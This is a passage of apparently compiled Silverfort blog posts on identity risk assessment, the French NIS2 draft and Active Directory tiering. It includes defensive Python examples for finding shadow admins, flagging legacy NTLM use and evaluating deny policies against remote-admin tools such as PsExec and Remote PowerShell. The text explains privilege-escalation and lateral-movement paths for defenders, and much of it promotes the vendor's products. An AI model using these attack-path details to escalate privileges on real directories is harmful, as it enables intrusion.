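for the directory ACEs that grant "Reset Password" over another account.
"""
from dataclasses import dataclass, field

ADMIN_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
# Legacy protocols the assessment flags; NTLMv1 is the weakest (brute-forceable).
WEAK_PROTOCOLS = {"NTLMv1": "critical", "NTLM": "high"}


@dataclass
class Account:
    sam: str
    kind: str                                    # "user" or "service"
    groups: set = field(default_factory=set)
    can_reset: set = field(default_factory=set)  # accounts whose password it may reset


def is_admin(acct: Account) -> bool:
    return bool(acct.groups & ADMIN_GROUPS)


def find_shadow_admins(inventory: dict) -> set:
    """Accounts outside every admin group that can reset an admin's password,
    directly or through a chain of reset rights (fixed point over the graph)."""
    privileged = {s for s, a in inventory.items() if is_admin(a)}
    changed = True
    while changed:
        changed = False
        for sam, acct in inventory.items():
            if sam not in privileged and acct.can_reset & privileged:
                privileged.add(sam)
                changed = True
    return {s for s in privileged if not is_admin(inventory[s])}


def parse_auth_log(auth_log):
    """Yield (user, proto, logon_type, src, dst) from CSV-style lines; skip junk."""
    for line in auth_log:
        fields = [f.strip() for f in line.split(",")]
        if len(fields) == 5:
            yield tuple(fields)


def legacy_auth_findings(inventory: dict, auth_log) -> list:
    """Privileged accounts (admins and shadow admins) seen on NTLM or NTLMv1."""
    shadow = find_shadow_admins(inventory)
    findings = []
    for user, proto, _logon, _src, dst in parse_auth_log(auth_log):
        acct = inventory.get(user)
        if acct is None or proto not in WEAK_PROTOCOLS:
            continue
        if is_admin(acct) or user in shadow:
            findings.append((user, proto, WEAK_PROTOCOLS[proto], dst))
    return findings


def hybrid_service_accounts(inventory: dict, auth_log) -> set:
    """Service accounts used for interactive logon (the hybrid-account malpractice)."""
    return {user for user, _p, logon, _s, _d in parse_auth_log(auth_log)
            if logon == "interactive" and user in inventory
            and inventory[user].kind == "service"}


# Constructed inventory: alice is a real admin, bob can reset alice (shadow
# admin), carol can reset bob (second-hop shadow admin).
INVENTORY = {a.sam: a for a in [
    Account("alice", "user", {"Domain Admins"}),
    Account("bob", "user", {"Helpdesk"}, {"alice"}),
    Account("carol", "user", {"Staff"}, {"bob"}),
    Account("dave", "user", {"Staff"}),
    Account("erin", "user", {"Administrators"}),
    Account("svc_backup", "service", {"Backup Operators"}),
    Account("svc_sql", "service"),
]}

# Constructed authentication log: user,proto,logon_type,src,dst
AUTH_LOG = [
    "alice,Kerberos,network,ws01,dc01",
    "alice,NTLMv1,network,ws01,fs01",
    "bob,NTLM,interactive,ws02,app01",
    "dave,NTLM,network,ws03,app01",
    "svc_sql,NTLM,network,app01,sql01",
    "svc_backup,Kerberos,interactive,ws04,fs01",
]

if __name__ == "__main__":
    print("shadow admins:", sorted(find_shadow_admins(INVENTORY)))
    print("legacy auth by privileged accounts:", legacy_auth_findings(INVENTORY, AUTH_LOG))
    print("hybrid service accounts:", sorted(hybrid_service_accounts(INVENTORY, AUTH_LOG)))
```

Note that dave's NTLM logon is not reported: the check is scoped to privileged accounts, which is where the assessment's prioritization starts.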
Even attempting to manually implement identity security solutions on each legacy application or server is difficult, since tampering with them can result in malfunctions or even process terminations.

### Next Steps: Following Up on a Risk Assessment

Prioritization: Different risks pose different threats. To resolve the identified risks effectively, organizations should prioritize them based on their potential impact and probability in order to allocate resources most efficiently. For example, an organization may start with highly privileged accounts, critical applications, and any other factors it deems necessary.

Mitigation: Risks can be addressed based on their root cause: misconfigurations, malpractices, and security coverage gaps. Mitigation steps can be taken accordingly to reduce these risks and improve the organization's identity security posture; for example:

- Misconfigurations: Misconfigurations occur when incorrect or unsuitable configurations are applied during user creation, which can result in security weaknesses. Misconfigurations are inevitable, even more so in larger environments. Shadow admins, for example, are a common misconfiguration. Misconfigurations can be resolved by restoring the proper configuration, for example by removing the excessive privileges granted to a shadow admin.
- Malpractices: The term malpractice refers to actions taken unintentionally or improperly that can result in substantial weaknesses, such as hybrid service accounts or excessive NTLM authentications. Hybrid service accounts arise when an admin uses a service account for interactive login, or a personal account to automate tasks. To resolve such malpractices, it is necessary to ensure that IT staff and admins adhere to security best practices.
- Security Coverage Gaps: Accounts and resources not covered by security controls create major security gaps. These gaps lead to identity risks that are very difficult to resolve.
Examples include MFA for legacy apps and password rotation for service accounts. Organizations must search for a solution to overcome these risks, or alternatively ensure that the security team closely monitors such users and resources.

### Identity Risk Assessment with Silverfort

Silverfort provides a unified identity security platform that prevents identity threats in real time. This gives organizations full visibility into all access attempts and the ability to deny access to resources, regardless of authentication protocol, across all on-prem, cloud, and hybrid identity environments. Through Silverfort's unified identity security platform, organizations can perform a comprehensive identity risk assessment to reveal and mitigate the security gaps, misconfigurations and malpractices attackers can exploit for credential access, privilege escalation and lateral movement.

Identity Security Posture Management (ISPM): Comprehensive visibility into identity threat exposures such as service accounts, shadow admins, and legacy protocols like NTLMv1, among others. This includes monitoring and analyzing authentications, access patterns, and behaviors to gather insights into the organization's identity security posture and provide recommendations on how to remove the risks, such as implementing monitoring solutions and removing excessive permissions from privileged accounts.

Authentication Firewall: An authentication firewall is a method of controlling user access to resources by enforcing strict access and authentication controls. Silverfort's authentication firewall enables organizations to enforce risk-based policies and identity segmentation to block unauthorized access attempts and ensure users only access the resources they need. No changes to the underlying infrastructure are needed, and the authentication firewall's policies can be implemented quickly and seamlessly.
MFA for All: Silverfort integrates with Active Directory so that all access requests are forwarded to Silverfort, allowing it to enforce MFA verification across all systems in the organization's identity infrastructure, including legacy systems.

Service Account Protection: Automatic discovery and management of service accounts. Silverfort can detect service accounts by analyzing their behavioral patterns and automatically configure access policies in the event that a compromised service account is detected.

To discuss how Silverfort can assist your organization in assessing its identity risk, fill out this form and schedule a meeting with a Silverfort identity security expert.

---
- Published: 2024-07-16
- Modified: 2024-10-02
- URL: https://www.silverfort.com/blog/french-transposition-of-the-nis2-directive/

ANSSI has been working for several months on transposing the European NIS2 directive into French law. Recently, a first draft circulated online, initially published by LeMagIT, and several publications have dissected it. Pending the publication of a final version, this document already offers an important perspective on the authorities' approach to implementing this new law for securing the information systems of "important" and "essential" entities in France. In this blog we analyze the rules it contains that concern the identity domain, namely the management and protection of identities, access and directories.

### Directories, the "trusted core of information systems"

This is the term the document uses to refer to the entity's directories. No surprise to specialists familiar with ANSSI.
Last year, ANSSI had already published a guide of recommendations on administering the Active Directory (AD) directory, stating in its introduction that "When an AD is placed at the core of an IS infrastructure (authentication management, assignment of access rights to resources, configuration of security policies, etc.), the IS is considered to rest on the AD. In this context, a compromise of the AD often leads to a global compromise of the IS." A few months later, the Agence Nationale de Santé (ANS), with contributions from ANSSI, published the CaRE action plan for healthcare establishments, according to which "the technical directory is the main means of propagation, through which attackers obtain elevated privileges, allowing them to inflict more damage." Indeed, even if an attacker initially breaches a victim's information systems by means of system vulnerabilities or a phishing campaign, this first compromise will rarely have dramatic consequences. The challenge for the organization is to prevent the attacker from obtaining and exploiting the credentials of privileged users, which would allow them to infiltrate the information system more broadly and extract sensitive data: "When the attacker holds administration rights over the trusted core, the entity's information systems are considered fully compromised, with consequences for the entity that can extend to having to rebuild all or part of its information systems." Any compromise of administration rights over the information system necessarily passes through the directories: mainly Active Directory, but also Entra ID, Ping, Okta, and so on.
In the circulating version of the NIS2 transposition document, ANSSI therefore requires numerous actions aimed at hardening the security of administration accounts and directories.

### Knowing what to protect

ANSSI thus proposes hygiene and system segmentation measures that are accessible and achievable for all the entities concerned, provided they dedicate the necessary resources. Objectives #4 and #5 in particular highlight the need for "essential" entities to first map, and then regularly audit, the regulated information systems and the ecosystem of service providers. "Important" entities are exempt from these constraints but must nevertheless maintain a map of their ecosystem, including in particular the suppliers contributing to their IT activities and the list of interconnections with their internal systems. One of the common difficulties affecting the identity domain is precisely full visibility of the various accesses that need to be protected. The oldest infrastructure elements, sometimes described as "legacy", are opaque. The same goes for service accounts and machine access, whose inventory, sources and dependencies are not always fully known. For both internal and external access, it therefore remains difficult to control and trace the logins and activities operating on these resources. These challenges also show up in merger and acquisition scenarios, common in some sectors now covered by NIS2, when two distinct information systems must be unified without the administrators in charge of the task being fully familiar with the resources now under their responsibility.
Regular audits will therefore be necessary in the context of mergers and acquisitions to avoid any risk of incorporating "shadow IT", that is, uninventoried systems, into an entity's infrastructure, which would make it non-compliant. Objective 7, on patching vulnerabilities, affects all software and systems. Within the identity perimeter, the main culprits will be organizations still running old versions of Active Directory or applications using weak protocols, notably NTLMv1 or unencrypted LDAP. Fortunately, solutions exist, some of them free, to identify this type of weakness, phase it out progressively, or add security controls such as conditional access or multi-factor authentication.

### Hygiene and tiering

The most relevant articles on securing identities and access appear in objectives 9, 10, 13, 14, 15 and 16. These articles reiterate well-known best practices and make them mandatory: quickly disable former employees' accounts; change passwords regularly; respect the principle of least privilege; avoid shared accounts; and so on. In objectives 9, 14, 15 and 16, the segmentation of resources and access into tiers features prominently. ANSSI requires the exclusive use of administration accounts for administration actions, and measures ensuring "the traceability of administration actions performed". It tightens these expectations further for "essential" entities, for which administration actions must be carried out from an information system and workstations dedicated to that purpose. The same dynamic applies to the subcontracting chain, the service providers and suppliers who authenticate to the information systems of the entities concerned through remote access.
This access must now be protected by at least a single-factor authentication mechanism, and by multi-factor authentication for "essential" entities. For Active Directory authentications, these efforts are particularly critical, since this access does not natively benefit from common controls such as adaptive MFA or conditional access. Among the measures achievable without resorting to a commercial platform, therefore, these compartmentalization efforts and respect for the integrity of Tiers 0 and 1 (for organizations that have adopted the model recommended by Microsoft) are indeed essential to close the door on attacks. Service accounts will also pose bigger problems. Although the document does not refer to them explicitly, the articles concerning "automated processes" in objective 13 certainly cover this access. All entities will therefore have to ensure that these accounts are used exclusively to perform well-defined functions, and prevent their diversion to other tasks. If their passwords cannot be changed regularly, other access controls will also have to be put in place.

### Worrying flaws and weaknesses

On some questions, one may wonder why ANSSI does not go further in its transposition of NIS2. Regarding MFA, for example, the original text of the European directive requires "the use of multi-factor authentication or continuous authentication solutions within the entity, where appropriate". Those last two words inevitably lead to more or less strict interpretations. The current draft of the French transposition takes a lenient position. For "important" entities, no clause imposes MFA. Putting in place a password-based authentication mechanism is enough to remain compliant.
Even within the framework of protecting privileged access, it is surprising not to see MFA imposed on top of the requirements for tier segmentation and traceability of actions. Such a measure would have been aligned with the spirit of the European directive and with the requirements of cyber insurers. This omission seems all the more surprising for "essential" entities, for which MFA is only required for remote access through a third-party information system, for example for external service providers. What about other privileged access, for example to protect logons of domain administrator accounts? According to Microsoft, MFA can block 99.9% of attacks; why not impose its application more firmly in our critical structures? The current version is clearly meant to be realistic and accessible. In about ten cases, ANSSI therefore envisages alternative measures "when technical or operational reasons do not allow" implementation of the measure initially envisaged. Thus an organization that cannot, for example, put MFA in place on remote access (objective 9), change passwords (objective 13), create individual accounts for users or automated tasks (objective 13), or carry out administration actions from an administration account (objective 14) can nevertheless remain compliant provided it finds other means of mitigating the associated risks. Clearly, some of these directives can prove technically difficult, sometimes even impossible. Unfortunately, many organizations take this type of regulation lightly; it becomes a matter of ticking boxes rather than genuinely reducing the risk of attack.
The number of possible exceptions or derogations therefore seems surprising, and risks leaving the door open to future attacks within less scrupulous entities. It is therefore a pity that ANSSI did not decide to tighten some of these requirements further.

### Conclusion

It is good to see this first draft taking shape several months before the deadline imposed by the European directive. This will give the organizations concerned a first idea of which projects to prioritize. Clearly, the measures imposed, notably for "essential" entities, will help modernize and harden security around critical infrastructure. In an ever more uncertain geopolitical context, France and Europe absolutely must guard against the threat of debilitating attacks. All the more so since some national-level bodies, notably in the public sector, have an alarming level of cybersecurity maturity. Fortunately, several companies and organizations have already proactively taken measures that conform to the expectations of the document circulated by ANSSI. Participants at the Assises de la Cybersécurité in recent years will, for example, have noticed a large number of attendees already implementing tiering and bastion projects within their organizations. Even if these examples are more common in the private sector than in the public sector, we can hope that the lessons learned and the expertise accumulated in this way will benefit the country's infrastructure as a whole.

### How can Silverfort help with NIS2 compliance?

Silverfort can help with compliance with these directives.
In barely one month, and without requiring heavy changes to your infrastructure, our platform can:

- Objective 5: quickly inventory all access and privileges within the directories, including the sources and dependencies of each authentication; carry out a complete inventory of service accounts and hybrid accounts
- Objective 9: quickly identify privileged accounts prior to segmentation into security zones
- Objective 10: protect your remote access (RDP, RDS, SSH, PowerShell, PsExec, WMI) with an MFA solution of your choice (compatible with Microsoft Authenticator, Ping, Duo, Okta, Yubico keys or other FIDO2 tokens)
- Objective 13: identify accounts holding excessive privileges and access using old passwords; alert on or block any access attempt from a service account that deviates from its usual behavior; log access across all directories
- Objectives 14 and 15: extend MFA to logon on administrator workstations; alert on or block access attempts that do not respect tier segmentation rules, for example between tier 1 and tier 0; alert on or block attempts to bypass the bastion, for example via a service account
- Objective 16: log authentications by humans and machines across all directories, including their sources and destinations

To learn more about how Silverfort can help you meet your identity security challenges, request a demo here.

---
- Published: 2024-07-11
- Modified: 2024-10-02
- URL: https://www.silverfort.com/blog/ad-tiering-protecting-admin-access-to-tiers-1-and-2/

As the identity attack surface continues to evolve with new methods of compromising organizations, the need to secure an organization's Active Directory (AD) becomes increasingly important.
While Active Directory tiering is a fundamental practice for segregating and protecting high-privilege accounts, many organizations overlook its importance, leaving them vulnerable to malicious actors. Implementing stringent security controls for access groups is essential to prevent unauthorized access and lateral movement within the network. In this blog, we will explore the essentials of AD tiering and its common protection challenges, and discuss how Silverfort's protection capabilities help organizations overcome these challenges, making the protection of AD tiering simpler and more efficient.

### Common Challenges to Extend Access Controls Beyond Tier 0

Once an Active Directory tiering project has reached the implementation phase, native controls (Active Directory group policies with logon restrictions) and/or Authentication Policy Silos are typically used to lock down access to Tier 0 (Domain Controllers, PKI online signing CA, Entra Connect / AD FS), which is then managed exclusively from dedicated admin consoles, the Privileged Access Workstations.

However, for various reasons, organizations often struggle to extend this approach to Tier 1, where usually 98% of all admin accounts and privileged service accounts reside. As a result, prospective customers often ask us how we can help them implement effective access controls beyond Tier 0. The following are the main challenges that most organizations experience when they try to extend secure authentication and access controls to Tier 1 and Tier 2:

#### GPOs (Group Policy Objects) Do Not Scale

The large number of distinct access control permutations required for each combination of role (app owner, database admin, backup, etc.), resource (application name) and environment (dev/test/staging/prod) necessitates so many GPOs that implementing and operating them to enforce least privilege inside Tier 1 becomes too complex to manage successfully.
#### Centrally Defined Logon Restrictions, but Locally Applied

Logon restrictions, the most common method of implementing access controls, are centrally defined and stored in the SYSVOL file share, downloaded to each computer by the Group Policy client and applied locally. This approach has several drawbacks:

- Users or processes with administrator privileges on a system can change, disable or modify user logon restrictions for other accounts.
- Issues parsing group policies can lead to logon restrictions not being applied.
- To detect issues when applying the policies, or attempts to bypass them (e.g. using ntrights.exe or Carbon), monitoring for local configuration changes on each system is required, as well as centralized reporting of any non-compliance notifications.

#### Separate Access Controls for Non-Windows Active Directory Assets

A sizable footprint of non-Windows infrastructure is somehow integrated with Active Directory: *NIX systems joined using some form of AD bridging, and applications and appliances that rely on LDAP, Kerberos or NTLM authentication with AD, often using a service account rather than a machine identity, and that process few or no group policies. These devices, applications and appliances need their own access controls, typically locally defined and tied to AD group membership. Each of these resources requires a dedicated configuration for access controls and for compliance monitoring.

#### Microsoft Authentication Policy Silos: No Panacea

To overcome the issues associated with access controls applied locally on each piece of the infrastructure, Microsoft proposes Authentication Policy Silos. These can be effective for centrally managing and enforcing authentication boundaries for accounts and assets, and they are evaluated by the domain controller for each authentication.
While a great method to lock down Tier 0, their lack of flexibility tends to prevent rollout on Tier 1, since assets (resources and accounts) can only be part of a single authentication policy silo at a time. Oftentimes, different groups of privileged users need access to different, partly overlapping sets of systems, which does not fit the Authentication Policy Silos model.

To use Authentication Policy Silos, Kerberos Armoring (FAST) needs to be enabled. Not all existing tools, notably some Privileged Access Management / bastion-type solutions, are compatible with Kerberos Armoring.

After the implementation of effective access controls in Tier 0, rollout to other tiers often stalls due to one or more of the above challenges encountered by IT staff, which until now were very hard to work around. Let's discuss some of the things Silverfort can do to extend the implementation of access controls and MFA beyond Tier 0.

### How Silverfort Helps with AD Tiering

Silverfort can enhance Active Directory (AD) tiering by offering extensive visibility and control over user access across the organization. It continuously monitors authentication and access activities, assigning risk indicators and scores to users and machines based on their behavior patterns, and checks whether the authentication context matches any Silverfort authentication policy. If there is a match, the policy defines whether to allow the authentication, pause it to enforce MFA, or block it, much like a traffic light for your Active Directory authentications. This process helps identify and manage access to high-risk or high-value assets, which is crucial for AD tiering. Additionally, Silverfort's integration with Azure AD provides further insights into user behavior and risk, supporting the implementation of an effective AD tiering strategy.
Let’s see exactly how this is done in Silverfort’s console.

#### Protection

Silverfort policies extend the concept of conditional access controls to Active Directory, allowing control over who can authenticate where, as well as over the authentication assurance level (whether MFA is required, and which authentication types are accepted during the secondary authentication step). Policies are based on the user context, enriched by Silverfort's own risk engine as well as by any risk reported by third-party risk engines such as those in EDR, XDR and cloud identity silos, and are centrally enforced at the domain controller.

Here are some example Silverfort authentication policies that can help with the implementation of an AD tiering model:

Block interactive logon across Tiers: After awareness training with IT admins who crossed tier barriers with their Tier 0 or Tier 1 accounts (for example, discovered using the NOTIFY policies proposed in the AD tiering blog article on visibility), it can be a good time to switch those policies from the NOTIFY to the DENY action, to block inappropriate account usage across tiers and get real-time alerts as well as daily reports on any such attempts.

Figure 1 - Example policy in Silverfort to block authentications with Tier 1 accounts on Tier 2 assets

Protect Privileged User Accounts With Appropriate MFA: Access with privileged accounts in any tier can be protected with appropriate MFA methods. For example, remote administration of "Application X in PROD" by the Tier 1 application administrators for this perimeter can be protected with FIDO2 and/or Silverfort mobile push MFA if no dedicated third-party MFA is available for the Tier 1 accounts.

Figure 2 - Policy to protect access with Tier 1 admin accounts using appropriate MFA methods.

Secure Console Access on Domain Controllers: If console access to domain controllers is possible (e.g. through the hypervisor) and not adequately protected, the Silverfort for Windows Logon policy can help protect the console access.

Figure 3 - Policy to protect access to the domain controller console with MFA

Enforce Usage of Tier-Specific Admin Solutions: To force administration from a dedicated admin jump server or PAM solution in Tier 1, RDP and Remote PowerShell authentication can be denied from any other origin using a DENY policy.

Figure 4 - Authentication policy to prevent bypass of the admin station (administrative jump hosts, PAM, PAW, VDI or otherwise) in place to manage specific assets in Tier 1.

Stop Lateral Movement by User Accounts Within a Tier: To limit lateral movement and implement least privilege within Tier 1, remote administration of a group of servers ("Application X in PROD") can be limited to the group(s) of administrators for those application servers using a DENY policy.

Figure 5 - Example policy to stop lateral movement by implementing least privilege for remote management of Application X servers in PROD.

Stop Lateral Movement by Service Accounts Within a Tier: To limit lateral movement and implement least privilege within Tier 1, service accounts can be "ring-fenced" to only allow access to the perimeter where they should operate.

Figure 6 - An example ring-fence policy for a privileged service account to prevent lateral movement.

### Silverfort Protection Policies Help Extend AD Tiering Beyond Tier 0

The combination of Silverfort Authentication Firewall, MFA policies and service account ring-fencing policies provides an elegant and effective approach to accelerating the deployment of Active Directory tiering beyond Tier 0. Silverfort can help protect accounts of any Active Directory tier with the MFA method most appropriate for the task.
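The six example policies above (cross-tier logon, MFA for Tier 1 admins and for DC console access, jump-host-only remote administration, per-application least privilege and service account ring-fencing) as a small evaluation model, added here as an example and not Silverfort's engine. The event fields, the "most restrictive verdict wins" rule, the NOTIFY-to-DENY switch and every host, group and account name are assumptions constructed for the example.

```python
"""Tier-aware authentication policy evaluation, modelled on the policies above.

Added example, not Silverfort's engine: the event fields, the policy shapes
and the "most restrictive verdict wins" rule are assumptions, and every host,
group and account name is constructed. Verdicts follow the traffic-light idea
from the post: ALLOW, NOTIFY (allow but alert), MFA (pause for a second factor),
DENY.
"""
from dataclasses import dataclass
from typing import Callable, List, Tuple

SEVERITY = {"ALLOW": 0, "NOTIFY": 1, "MFA": 2, "DENY": 3}
# Remote-administration protocols; the set is an assumption for the example.
REMOTE_ADMIN = {"RDP", "RemotePowerShell", "WMI", "PsExec"}
JUMP_HOSTS = {"jump01"}                        # constructed Tier 1 jump host
APPX_ADMINS = "AppX-Admins"                    # constructed admin group for App X
SERVICE_PERIMETER = {"svc_appx": "AppX-PROD"}  # ring-fence: account -> asset group


@dataclass(frozen=True)
class Event:
    user: str
    user_tier: int          # 0 = most privileged, 2 = least
    user_groups: frozenset
    is_service: bool
    src: str                # originating host
    dst: str                # target host
    dst_tier: int
    dst_group: str          # asset group, e.g. "AppX-PROD", "DomainControllers"
    protocol: str           # "Kerberos", "RDP", "Console", "Interactive", ...


@dataclass
class Policy:
    name: str
    action: str             # one of SEVERITY's keys
    match: Callable[[Event], bool]


def evaluate(event: Event, policies: List[Policy]) -> Tuple[str, List[str]]:
    """Return the verdict and the names of every policy that matched.
    All policies are checked; the most restrictive action wins (assumption)."""
    verdict, hits = "ALLOW", []
    for pol in policies:
        if pol.match(event):
            hits.append(pol.name)
            if SEVERITY[pol.action] > SEVERITY[verdict]:
                verdict = pol.action
    return verdict, hits


def with_action(policies: List[Policy], name: str, action: str) -> List[Policy]:
    """Copy of the policy list with one policy's action switched, e.g. from
    NOTIFY (audit mode) to DENY once the cross-tier logons have been cleaned up."""
    return [Policy(p.name, action if p.name == name else p.action, p.match)
            for p in policies]


POLICIES = [
    # Figure 1: a human account logging on to an asset of a lower-trust tier.
    Policy("cross-tier-logon", "DENY",
           lambda e: not e.is_service and e.dst_tier > e.user_tier),
    # Figure 2: Tier 1 admins reaching App X PROD over remote admin need MFA.
    Policy("appx-prod-admin-mfa", "MFA",
           lambda e: e.user_tier == 1 and e.dst_group == "AppX-PROD"
           and e.protocol in REMOTE_ADMIN),
    # Figure 3: console logon to a domain controller requires MFA.
    Policy("dc-console-mfa", "MFA",
           lambda e: e.dst_group == "DomainControllers" and e.protocol == "Console"),
    # Figure 4: remote admin of Tier 1 assets only from the jump host.
    Policy("t1-jump-host-only", "DENY",
           lambda e: e.dst_tier == 1 and e.protocol in REMOTE_ADMIN
           and e.src not in JUMP_HOSTS),
    # Figure 5: App X PROD remote admin only by its own admin group.
    Policy("appx-prod-least-privilege", "DENY",
           lambda e: e.dst_group == "AppX-PROD" and e.protocol in REMOTE_ADMIN
           and not e.is_service and APPX_ADMINS not in e.user_groups),
    # Figure 6: ring-fenced service account leaving its perimeter.
    Policy("svc-ring-fence", "DENY",
           lambda e: e.user in SERVICE_PERIMETER
           and e.dst_group != SERVICE_PERIMETER[e.user]),
]

# Constructed authentication events (all names invented for the example).
APPX = frozenset({APPX_ADMINS})
EVENTS = [
    Event("t1-appadmin", 1, APPX, False, "jump01", "appx-prod-01", 1, "AppX-PROD", "RDP"),
    Event("t1-appadmin", 1, APPX, False, "ws-corp-05", "appx-prod-01", 1, "AppX-PROD", "RDP"),
    Event("t1-dbadmin", 1, frozenset({"DB-Admins"}), False, "jump01", "appx-prod-01", 1, "AppX-PROD", "RDP"),
    Event("t1-appadmin", 1, APPX, False, "ws-corp-05", "ws-corp-05", 2, "Workstations", "Interactive"),
    Event("t0-admin", 0, frozenset({"Domain Admins"}), False, "hv01", "dc01", 0, "DomainControllers", "Console"),
    Event("svc_appx", 1, frozenset(), True, "appx-prod-01", "appx-prod-02", 1, "AppX-PROD", "Kerberos"),
    Event("svc_appx", 1, frozenset(), True, "appx-prod-01", "fs01", 1, "FileServers", "Kerberos"),
    Event("t2-user", 2, frozenset({"Staff"}), False, "ws-corp-09", "appx-prod-01", 1, "AppX-PROD", "Kerberos"),
]

if __name__ == "__main__":
    for ev in EVENTS:
        verdict, hits = evaluate(ev, POLICIES)
        print(f"{verdict:6} {ev.user:12} {ev.protocol:11} {ev.src} -> {ev.dst}  {hits}")
```

The last event shows that ordinary Tier 2 use of a Tier 1 application over Kerberos is untouched; only logon and remote-administration paths are constrained.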
The Silverfort authentication firewall allows detection and prevention of any cross-tier access by privileged accounts to prevent privilege escalation attacks, as well as limiting horizontal access within a tier to prevent lateral movement, using central enforcement while avoiding the typical complexities associated with existing methods. Both human and service accounts can be secured, blocking unauthorized access to stop lateral movement and prevent privilege escalation by an adversary. Using the security controls provided by Silverfort can accelerate the implementation of an Active Directory tiering project, or help get the project back on track if it has stalled after covering Tier 0.

Looking to strengthen your AD tiering management and gain complete visibility across your environment? Reach out to one of our experts here.

---
- Published: 2024-07-09
- Modified: 2025-07-21
- URL: https://www.silverfort.com/blog/ad-tiering-made-simpler/

Active Directory (AD) tiering is nothing new for organizations that need the most secure IT environments, like those in the defense and critical infrastructure spaces. While it is a surprisingly underused approach to partitioning and protecting an organization’s most valuable assets and accounts, it is starting to find its way into more businesses as an effective method to stop privilege escalation attacks in AD. AD tiering projects frequently go hand in hand with implementing the principle of least privilege to stop lateral movement within a tier. Additionally, they are often accompanied by the implementation of visibility tooling to provide insights on privileged account and legacy authentication protocol usage, both of which are key to a successful AD security tiering project.
In this blog, we'll explore the visibility challenges associated with Active Directory (AD) tiering and discuss how Silverfort's visibility capabilities help organizations overcome them, making the management of AD tiering simpler and more efficient.

Common Visibility Challenges in AD Tiering

Figure 1 - Typical distribution of admin and privileged service accounts in an Active Directory tiering model

Organizations typically start an AD tiering project by locking down human account access to Tier 0, which includes domain controllers, the online signing CA of the PKI, and Entra Connect / AD FS. They do this with Privileged Access Workstations and logon restrictions implemented through group policies and/or authentication policy silos. However, organizations often struggle to extend this approach beyond Tier 0, leaving Tier 1, where typically 98% of all admin accounts and privileged service accounts reside (see Figure 1), without full coverage. Here are the main challenges that most organizations experience with AD tiering:

Limited Visibility of Privileged Service Accounts

A large portion of service accounts have been in use for a long time and are often overprivileged. Their credentials may be stored unencrypted on the local filesystem, and it can be very challenging to understand exactly where and when they are used.

Insufficient Visibility of Account Mapping

It is essential to know which resources each privileged user actually accesses when designing a model of least-privileged access. These results then need to be validated and sanitized before being implemented as access rules.

Lack of Visibility of Legacy Protocol Usage

Ideally, all privileged users should be members of the "Protected Users" group. Membership blocks NTLM authentication, DES and RC4 Kerberos encryption types and Kerberos delegation for the account, and prevents its credentials from being cached on member workstations and servers.
Prior to enabling this group membership, it is necessary to obtain complete visibility into the usage of legacy authentication protocols by these privileged users in order to measure the potential impact and implement remediation measures. For the above reasons, organizations that have started their AD tiering journey typically manage to secure Tier 0 for their admin user accounts but get stuck trying to extend it to Tier 1.

How Silverfort Helps with AD Tiering

Silverfort can enhance AD tiering by offering extensive visibility and control over user access across the organization. It continuously monitors authentication and access activity, assigning risk indicators and scores to users and machines based on their behavior patterns. This helps identify and manage access to high-risk or high-value assets, which is crucial for AD tiering. Additionally, Silverfort's integration with Azure AD provides further insight into user behavior and risk, supporting the implementation of an effective AD tiering strategy.

Complete Visibility Across the AD Environment

Once deployed, Silverfort gets real-time visibility into domain-based authentications and collects the metadata for every authentication. Silverfort also scans for attack surfaces and misconfigurations and provides other metrics relevant to the security and health of your Active Directory deployment. Most of these metrics are presented as KPIs in dashboards, as live alerts that can be acted upon, or as high-level reports that give management an overview of Active Directory risk. Here are some examples of Silverfort capabilities relevant to visibility for AD tiering:

Detection of Privileged Accounts

To detect and monitor the user scope for Tier 0, Silverfort can quickly provide an inventory of all relevant accounts using the risk indicators "Domain Administrators", "Privileged Users" and "Shadow Admins".
Figure 2 - Inventory of privileged accounts with dedicated KPIs in Tier 0: Domain Admins, Privileged Users, and Shadow Admins

Clicking any of the relevant KPIs provides a detailed list of flagged accounts, including a short description of the risk, how to mitigate it, and a link to the relevant technique in the MITRE ATT&CK framework.

Figure 3 - List of shadow admin accounts

Detection of Service Accounts

Visibility into the usage of Active Directory service accounts is often lacking. Silverfort makes it easy to get an overview of all service account usage, along with relevant KPIs such as privileged service accounts, interactive logons (dual use), and a risk level based on the attack surface and any observed attacks or unusual behavior.

Figure 4 - Silverfort's Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info

Investigate Service Account Activities

For each Active Directory account of interest, Silverfort's investigation page provides detailed KPIs on where the account is used (Sources) and on its authentications to destination network services (Targets). This information is essential for defining the scope of the policies that implement least privilege.

Figure 5 - KPIs for a deep-dive investigation of each account, including all sources and destinations of authentications

Advanced Authentication Logs

Silverfort's authentication log, with built-in parsers for legacy protocols and weak encryption types, allows quick identification of authentications that privileged users should not be performing, such as NTLM logons, Kerberos tickets issued with RC4 or DES, and simple LDAP binds. With this information, legacy authentications can be eliminated or reduced to an absolute minimum, and privileged accounts can then be added to the "Protected Users" group in Active Directory with good visibility into the possible impact.
Figure 6 - Example log parser showing results for simple LDAP binds by a domain administrator account, as well as the risk indicators available for filtering usage of weak encryption types

Identity Security & Posture Management

The Threat Detection dashboard in Silverfort gives an overview of Active Directory attack surface management, using KPIs for common misconfigurations and other steps that should be taken to reduce the attack surface. Commonly detected issues should be addressed, especially when they concern privileged accounts or resources in Tier 0 or Tier 1.

Figure 7 - Selection of KPIs for AD attack surface management

Notification Access Policies

Once asset and account tiers have been established and organized using dedicated OUs or AD groups, it is easy to create authentication policies that raise real-time alerts on inappropriate account usage across tiers and produce daily reports on its occurrence.

Figure 9 - Example notify access policy for interactive logon across tiers with Tier 1 accounts

Real-Time Visibility Is Essential for Effective AD Tiering Management

Silverfort's innovations around visibility of Active Directory authentication allow a simple yet very effective approach to accelerating the deployment of Active Directory tiering. With relatively little deployment and configuration effort, organizations gain insight into account usage, attack surface and compliance with tiering policies, as well as user/service account and computer/resource risk. While there is no magical solution to rolling out tiering across all Active Directory assets in an organization, Silverfort makes the task significantly easier. Read our next blog in the AD tiering series, where we highlight the specific protection challenges associated with AD tiering and how Silverfort's enforcement capabilities can address them and strengthen your AD environment.
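The Advanced Authentication Logs section above describes finding the legacy authentications a privileged user still performs before moving that user into "Protected Users". As an added example that is not Silverfort's code, the following Python triages constructed Windows event records (Kerberos 4768 and 4769 with their ticket encryption type, NTLM credential validation 4776, and Directory Service event 2889 for cleartext simple binds) and separates the findings that Protected Users would actually block from weaker-but-tolerated ones. The records, hosts and account names are made up, and the field names are flattened versions of the events' message fields.

```python
"""Added example, not Silverfort's code: triage of constructed Windows security
log records to find what would break if privileged accounts were added to
"Protected Users". Event IDs follow the Windows Security and Directory
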